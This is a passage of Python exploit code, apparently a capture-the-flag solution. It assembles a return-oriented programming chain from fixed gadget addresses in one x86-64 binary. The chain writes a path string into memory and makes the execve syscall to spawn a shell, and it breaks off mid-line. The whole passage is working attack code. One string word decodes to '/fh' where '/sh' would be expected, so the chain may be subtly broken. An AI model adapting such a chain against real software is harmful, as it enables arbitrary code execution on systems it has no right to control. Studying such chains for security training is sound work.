payload = p64(0x402a9b)
#0x402a9b: pop rax ; retf
payload += p64(0x463070)+p32(0x4217ed)+p32(0x33)
# 0x00000000004217ed: xchg edx, eax; ret; 
payload += p64(0x402a9b)
# 0x402a9b: pop rax ; retf
payload += p64(0x6e69622f)+p32(0x459682)+p32(0x33)
# 0x0000000000459682: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x402a9b)
# 0x402a9b: pop rax ; retf
payload += p64(0x463074)+p32(0x4217ed)+p32(0x33)
# 0x00000000004217ed: xchg edx, eax; ret; 
payload += p64(0x402a9b)
# 0x402a9b: pop rax ; retf
payload += p64(0x68662f)+p32(0x459682)+p32(0x33)
# 0x0000000000459682: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x402a9b)
# 0x402a9b: pop rax ; retf
payload += p64(0x0)+p32(0x4217ed)+p32(0x33)
# 0x00000000004217ed: xchg edx, eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x463070)+p64(0x402a9b)
# 0x402a9b: pop rax ; retf
payload += p64(0x3b)+p32(0x4017d1)+p32(0x33)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x42400b)
# 0x000000000042400b: syscall; ret; 
payload +=
